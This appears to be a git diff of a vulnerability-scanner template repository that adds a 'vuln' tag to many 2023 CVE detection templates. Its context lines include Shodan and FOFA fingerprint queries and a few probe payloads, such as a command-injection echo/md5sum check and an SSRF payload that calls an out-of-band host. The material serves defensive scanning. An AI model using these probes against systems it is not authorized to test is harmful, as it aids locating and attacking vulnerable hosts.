title="icewarp" google-query: intitle:"icewarp" - tags: cve2023,cve,icewarp,redirect + tags: cve2023,cve,icewarp,redirect,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-40931.yaml b/http/cves/2023/CVE-2023-40931.yaml index 7734064cf9a..76bead31b5b 100644 --- a/http/cves/2023/CVE-2023-40931.yaml +++ b/http/cves/2023/CVE-2023-40931.yaml @@ -29,7 +29,7 @@ info: shodan-query: title:"Nagios XI" fofa-query: app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios + tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index 4ce633a4e63..c27b4fc0e42 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: phpjabbers product: availability_booking_calendar - tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index 75fb2619cf6..3e8aaaf0110 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: patton product: smartnode_sn200 - tags: cve,cve2023,smartnode,voip,patton,vkev + tags: cve,cve2023,smartnode,voip,patton,vkev,vuln variables: payload: "echo CVE-2023-41109 | md5sum" diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 1186ce2181e..98ba0c738c5 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: phpjabbers product: bus_reservation_system - tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index 47537677827..d804fcdfbb5 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -29,7 +29,7 @@ info: - html:"PHP Jabbers.com" - http.html:"php jabbers.com" fofa-query: body="php jabbers.com" - tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers + tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 225594bf455..47ad1a10298 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: phpjabbers product: service_booking_script - tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers + tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 1b42da54509..9d286a9dae9 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: phpjabbers product: night_club_booking_software - tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers + tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index dc48d3c1c64..0a0e50e28cc 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: phpjabbers product: cleaning_business_software - tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index 9d4d86a0820..787b9bf16c1 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -29,7 +29,7 @@ info: - html:"PHP Jabbers.com" - http.html:"php jabbers.com" fofa-query: body="php jabbers.com" - tags: cve,cve2023,packetstorm,xss,phpjabbers + tags: cve,cve2023,packetstorm,xss,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 2cc48cb46be..b8ef135909f 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -36,7 +36,7 @@ info: - icon_hash=-74348711 - body="qlik" google-query: intitle:"qlik-sense" - tags: cve2023,cve,kev,qlik,smuggling,windows,vkev + tags: cve2023,cve,kev,qlik,smuggling,windows,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 1aed16220df..3f4d1e42a1f 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-74348711 - body="qlik" google-query: intitle:"qlik-sense" - tags: cve2023,cve,qlik,traversal,kev,windows,vkev + tags: cve2023,cve,qlik,traversal,kev,windows,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4136.yaml b/http/cves/2023/CVE-2023-4136.yaml index d6467ae8b61..20691cd898e 100644 --- a/http/cves/2023/CVE-2023-4136.yaml +++ b/http/cves/2023/CVE-2023-4136.yaml @@ -25,7 +25,7 @@ info: product: craftercms shodan-query: http.html:"craftercms" fofa-query: body="craftercms" - tags: cve,cve2023,craftercms,xss + tags: cve,cve2023,craftercms,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index edc73009f10..b437db67570 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ fofa-query: body=/wp-content/plugins/ditty-news-ticker/ publicwww-query: /wp-content/plugins/ditty-news-ticker/ - tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations + tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4151.yaml b/http/cves/2023/CVE-2023-4151.yaml index c15065e3513..e1a13145223 100644 --- a/http/cves/2023/CVE-2023-4151.yaml +++ b/http/cves/2023/CVE-2023-4151.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="/wp-content/plugins/agile-store-locator" publicwww-query: /wp-content/plugins/agile-store-locator/ shodan-query: http.html:"/wp-content/plugins/agile-store-locator/" - tags: cve,cve2024,wp,wordpress,wp-plugin,agile-store-locator,xss + tags: cve,cve2024,wp,wordpress,wp-plugin,agile-store-locator,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 5e2e730a7ae..91d15fe1829 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: phpjabbers product: php_forum_script - tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-41597.yaml b/http/cves/2023/CVE-2023-41597.yaml index 1b1279699c8..9fc4d7f487f 100644 --- a/http/cves/2023/CVE-2023-41597.yaml +++ b/http/cves/2023/CVE-2023-41597.yaml @@ -25,7 +25,7 @@ info: fofa-query: - icon_hash="-614262549" - title="eyoucms" - tags: cve,cve2023,eyoucms,xss + tags: cve,cve2023,eyoucms,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-41599.yaml b/http/cves/2023/CVE-2023-41599.yaml index 4ca7d637b7d..799a2ea9e72 100644 --- a/http/cves/2023/CVE-2023-41599.yaml +++ b/http/cves/2023/CVE-2023-41599.yaml @@ -24,7 +24,7 @@ info: vendor: jfinalcms_project product: jfinalcms fofa-query: body="content=\"JreCms" - tags: cve,cve2023,jrecms,vkev + tags: cve,cve2023,jrecms,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-41621.yaml b/http/cves/2023/CVE-2023-41621.yaml index 444b1327b6c..a3faa9663e0 100644 --- a/http/cves/2023/CVE-2023-41621.yaml +++ b/http/cves/2023/CVE-2023-41621.yaml @@ -26,7 +26,7 @@ info: product: emlog max-request: 1 fofa-query: title="emlog" - tags: cve,cve2023,emlog,xss + tags: cve,cve2023,emlog,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 79386b25792..e59a92e5e62 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -22,7 +22,7 @@ info: max-request: 2 vendor: grupposcai product: realgimm - tags: cve,cve2023,realgimm,xss,grupposcai,vkev + tags: cve,cve2023,realgimm,xss,grupposcai,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index b1275723cc8..0b97e8d63e6 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: templatecookie product: adlisting - tags: cve,cve2023,adlisting,exposure,templatecookie + tags: cve,cve2023,adlisting,exposure,templatecookie,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 3c5b8bb4a88..6a5a289363f 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -26,7 +26,7 @@ info: product: rg-ew1200g_firmware shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" - tags: cve,cve2023,ruijie,router,intrusive,vkev + tags: cve,cve2023,ruijie,router,intrusive,vkev,vuln variables: password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 76270e1de1a..8fa7295f18d 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -34,7 +34,7 @@ info: - mooSocial - moosocial - icon_hash="702863115" - tags: cve2023,cve,packetstorm,moosocial,xss + tags: cve2023,cve,packetstorm,moosocial,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 11f4ad54113..c65863b0da0 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -33,7 +33,7 @@ info: fofa-query: - icon_hash="702863115" - moosocial - tags: cve,cve2023,packetstorm,moosocial,xss + tags: cve,cve2023,packetstorm,moosocial,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index c92b547dfea..c245396817b 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -28,7 +28,7 @@ info: - html:"Skype for Business" - http.html:"skype for business" fofa-query: body="skype for business" - tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft,vkev + tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft,vkev,vuln variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 06be7471a80..96c7251bb87 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -34,7 +34,7 @@ info: - icon_hash=-47932290 - body=craftcms publicwww-query: "craftcms" - tags: cve2023,cve,rce,unauth,craftcms,vkev + tags: cve2023,cve,rce,unauth,craftcms,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index e989bec6f4b..675a40576e8 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -24,7 +24,7 @@ info: vendor: chamilo product: chamilo_lms shodan-query: "X-Powered-By: Chamilo" - tags: cve,cve2023,chamilo,lms,rce,intrusive,file-upload,vkev + tags: cve,cve2023,chamilo,lms,rce,intrusive,file-upload,vkev,vuln variables: filename: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 5ea00d7af03..0a76db3133a 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -22,7 +22,7 @@ info: vendor: alkacon fofa-query: title="opencms" google-query: intitle:"opencms" - tags: cve,cve2023,xss,opencms + tags: cve,cve2023,xss,opencms,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-42344.yaml b/http/cves/2023/CVE-2023-42344.yaml index b8fe5c23c97..c1edf935ed5 100644 --- a/http/cves/2023/CVE-2023-42344.yaml +++ b/http/cves/2023/CVE-2023-42344.yaml @@ -18,7 +18,7 @@ info: vendor: alkacon product: opencms fofa-query: "OpenCms-9.5.3" - tags: cve,cve2023,xxe,opencms,vkev + tags: cve,cve2023,xxe,opencms,vkev,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index ce9d169f7c7..a8d8484b8cd 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -30,7 +30,7 @@ info: fofa-query: - title="JumpServer" - title="jumpserver" - tags: cve2023,cve,jumpserver,exposure,fit2cloud + tags: cve2023,cve,jumpserver,exposure,fit2cloud,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 523d6bd60dc..d737a9bb6ea 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -33,7 +33,7 @@ info: - title=TeamCity - title=teamcity google-query: intitle:teamcity - tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev,vkev + tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4284.yaml b/http/cves/2023/CVE-2023-4284.yaml index 369de7143aa..e8c67577865 100644 --- a/http/cves/2023/CVE-2023-4284.yaml +++ b/http/cves/2023/CVE-2023-4284.yaml @@ -23,7 +23,7 @@ info: product: post-timeline shodan-query: http.html:"wp-content/plugins/post-timeline/" fofa-query: body="wp-content/plugins/post-timeline/" - tags: cve,cve2023,wordpress,wp,wp-plugin,xss,post-timeline,authenticated + tags: cve,cve2023,wordpress,wp,wp-plugin,xss,post-timeline,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml index efd586a2fd0..4caeefaa105 100644 --- a/http/cves/2023/CVE-2023-43177.yaml +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -26,7 +26,7 @@ info: product: crushftp shodan-query: http.html:"crushftp" fofa-query: body="crushftp" - tags: cve,cve2023,crushftp,unauth,rce,intrusive,vkev + tags: cve,cve2023,crushftp,unauth,rce,intrusive,vkev,vuln flow: http(1) && http(2) && http(3) variables: diff --git a/http/cves/2023/CVE-2023-43187.yaml b/http/cves/2023/CVE-2023-43187.yaml index 7d9897c99d0..b93dcc46869 100644 --- a/http/cves/2023/CVE-2023-43187.yaml +++ b/http/cves/2023/CVE-2023-43187.yaml @@ -23,7 +23,7 @@ info: product: nodebb shodan-query: cpe:"cpe:2.3:a:nodebb:nodebb" fofa-query: "title=\"nodebb\"" - tags: cve,cve2023,nodebb,rce + tags: cve,cve2023,nodebb,rce,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index 9184bdc6515..738dd2cf646 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -28,7 +28,7 @@ info: - http.title:"mirth connect administrator" fofa-query: "title=\"mirth connect administrator\"" google-query: "intitle:\"mirth connect administrator\"" - tags: packetstorm,cve,cve2023,nextgen,rce,kev,vkev + tags: packetstorm,cve,cve2023,nextgen,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index a80d51cdd59..2f73fdb0c30 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -26,7 +26,7 @@ info: vendor: milesight product: ur51 shodan-query: http.html:rt_title - tags: cve2023,cve,router,milesight,disclosure,unauth,iot,vkev + tags: cve2023,cve,router,milesight,disclosure,unauth,iot,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-43323.yaml b/http/cves/2023/CVE-2023-43323.yaml index dd2a9aafa95..e48c409a65e 100644 --- a/http/cves/2023/CVE-2023-43323.yaml +++ b/http/cves/2023/CVE-2023-43323.yaml @@ -30,7 +30,7 @@ info: - mooSocial - moosocial - icon_hash="702863115" - tags: cve,cve2023,moosocial,oast + tags: cve,cve2023,moosocial,oast,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 2e7d9b1b13f..f7c3ea7ff82 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -27,7 +27,7 @@ info: product: moosocial shodan-query: http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" - tags: cve2023,cve,xss,moosocial + tags: cve2023,cve,xss,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index 941d45c4308..c06df898321 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -26,7 +26,7 @@ info: product: moosocial shodan-query: http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" - tags: cve2023,cve,xss,moosocial + tags: cve2023,cve,xss,moosocial,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-43373.yaml b/http/cves/2023/CVE-2023-43373.yaml index e506805eb7f..2bcc2518bfb 100644 --- a/http/cves/2023/CVE-2023-43373.yaml +++ b/http/cves/2023/CVE-2023-43373.yaml @@ -27,7 +27,7 @@ info: product: hoteldruid fofa-query: title="hoteldruid" shodan-query: title:"hoteldruid" - tags: cve,cve2023,hoteldruid,sqli + tags: cve,cve2023,hoteldruid,sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index fd367eaf59b..e8f1a9a7cc3 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -34,7 +34,7 @@ info: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: time-based-sqli,cve,cve2023,hoteldruid,cms,sqli,digitaldruid + tags: time-based-sqli,cve,cve2023,hoteldruid,cms,sqli,digitaldruid,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-43472.yaml b/http/cves/2023/CVE-2023-43472.yaml index 442769b3f20..cda4fe17019 100644 --- a/http/cves/2023/CVE-2023-43472.yaml +++ b/http/cves/2023/CVE-2023-43472.yaml @@ -26,7 +26,7 @@ info: product: mlflow shodan-query: http.title:"mlflow" fofa-query: app="MLflow" - tags: cve,cve2023,mflow,exposure + tags: cve,cve2023,mflow,exposure,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-43654.yaml b/http/cves/2023/CVE-2023-43654.yaml index 9f1b9ba1b76..6a2b1bb45e8 100644 --- a/http/cves/2023/CVE-2023-43654.yaml +++ b/http/cves/2023/CVE-2023-43654.yaml @@ -24,7 +24,7 @@ info: vendor: pytorch product: torchserve fofa-query: body="Requested method is not allowed, please refer to API document" - tags: cve,cve2023,pytorch,oast,ssrf + tags: cve,cve2023,pytorch,oast,ssrf,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-43662.yaml b/http/cves/2023/CVE-2023-43662.yaml index 0fba7a50503..8ed98344cd4 100644 --- a/http/cves/2023/CVE-2023-43662.yaml +++ b/http/cves/2023/CVE-2023-43662.yaml @@ -26,7 +26,7 @@ info: vendor: shokoanime product: shokoserver fofa-query: title="Shoko WEB UI" - tags: cve,cve2023,shoko,web-aui,lfi + tags: cve,cve2023,shoko,web-aui,lfi,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 24c90c2c93b..28de9927a1e 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -32,7 +32,7 @@ info: - app="geoserver" - title="geoserver" google-query: intitle:"geoserver" - tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo,vkev + tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo,vkev,vuln variables: oast: "{{interactsh-url}}" string: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2023/CVE-2023-44012.yaml b/http/cves/2023/CVE-2023-44012.yaml index ce27e219eb4..cf80f45c79c 100644 --- a/http/cves/2023/CVE-2023-44012.yaml +++ b/http/cves/2023/CVE-2023-44012.yaml @@ -27,7 +27,7 @@ info: vendor: mojoportal product: mojoportal fofa-query: title="mojoPortal" - tags: cve,cve2023,mojoportal,xss + tags: cve,cve2023,mojoportal,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 03a49b44ac8..0bcb71dc813 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -26,7 +26,7 @@ info: product: rg-ew1200g_firmware shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" - tags: cve2023,cve,ruijie,router,ruijienetworks + tags: cve2023,cve,ruijie,router,ruijienetworks,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index 24baf061d4a..768f4077308 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -31,7 +31,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2023,coldfusion,adobe,xss + tags: cve,cve2023,coldfusion,adobe,xss,vuln variables: string: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index 28c4f3cc997..715c48ba2ca 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -36,7 +36,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,adobe,coldfusion,deserialization,xss + tags: cve2023,cve,adobe,coldfusion,deserialization,xss,vuln variables: windows_known_path: "C:\\Windows\\" windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\" diff --git a/http/cves/2023/CVE-2023-44393.yaml b/http/cves/2023/CVE-2023-44393.yaml index 817ad3c1a37..9963533706a 100644 --- a/http/cves/2023/CVE-2023-44393.yaml +++ b/http/cves/2023/CVE-2023-44393.yaml @@ -26,7 +26,7 @@ info: product: piwigo shodan-query: http.favicon.hash:540706145 fofa-query: title="piwigo" - tags: cve,cve2023,piwigo,xss,authenticated + tags: cve,cve2023,piwigo,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index ff03efe8d79..805bd3f21d5 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -30,7 +30,7 @@ info: - title="jeecg-boot" - title="jeecgboot 企业级低代码平台" google-query: intitle:"jeecg-boot" - tags: cve,cve2023,rce,jeecgboot,vkev + tags: cve,cve2023,rce,jeecgboot,vkev,vuln http: diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 26e55766efd..66c0ffb7251 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -32,7 +32,7 @@ info: fofa-query: - icon_hash=688609340 - body="cockpit" - tags: cve2023,cve,huntr,cockpit,xss,agentejo + tags: cve2023,cve,huntr,cockpit,xss,agentejo,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 55ef25e0865..a76fd78236b 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -28,7 +28,7 @@ info: product: moosocial shodan-query: "http.favicon.hash:\"702863115\"" fofa-query: "icon_hash=\"702863115\"" - tags: cve2023,cve,moosocial,xss + tags: cve2023,cve,moosocial,xss,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 77a7b1c545b..b53bbe4fb7c 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -31,7 +31,7 @@ info: - http.favicon.hash:702863115 - http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" - tags: cve,cve2023,moosocial,xss + tags: cve,cve2023,moosocial,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4490.yaml b/http/cves/2023/CVE-2023-4490.yaml index 0b6c2026f7a..48c29e8528c 100644 --- a/http/cves/2023/CVE-2023-4490.yaml +++ b/http/cves/2023/CVE-2023-4490.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: body="/wp-content/plugins/wp-job-portal" - tags: cve,cve2023,sqli,wp,wordpress,wp-plugin,wp-job-portal,time-based-sqli,vkev + tags: cve,cve2023,sqli,wp,wordpress,wp-plugin,wp-job-portal,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-45136.yaml b/http/cves/2023/CVE-2023-45136.yaml index 2c7e8072829..ceba5ce8200 100644 --- a/http/cves/2023/CVE-2023-45136.yaml +++ b/http/cves/2023/CVE-2023-45136.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2024,xwiki,xss + tags: cve,cve2024,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index 6100d1b89c3..20156426264 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -25,7 +25,7 @@ info: framework: wordpress shodan-query: "http.html:\"import-xml-feed\"" fofa-query: "body=\"import-xml-feed\"" - tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency + tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index ef1a341593e..abe091d9df8 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -23,7 +23,7 @@ info: product: pireospay framework: prestashop shodan-query: "http.component:\"prestashop\"" - tags: time-based-sqli,cve,cve2023,sqli,prestashop,pireospay,01generator + tags: time-based-sqli,cve,cve2023,sqli,prestashop,pireospay,01generator,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 026ec1204b5..bb4b58bf3b1 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -28,7 +28,7 @@ info: fofa-query: - body="DAR-8000-10" && title="D-Link" - body="dar-8000-10" && title="d-link" - tags: cve,cve2023,dlink,vkev + tags: cve,cve2023,dlink,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 42985696984..e4285249c94 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: spa-cart product: ecommerce_cms - tags: cve,cve2023,spa-cart,unauth,xss + tags: cve,cve2023,spa-cart,unauth,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index a81e67536b9..654a014be3e 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ 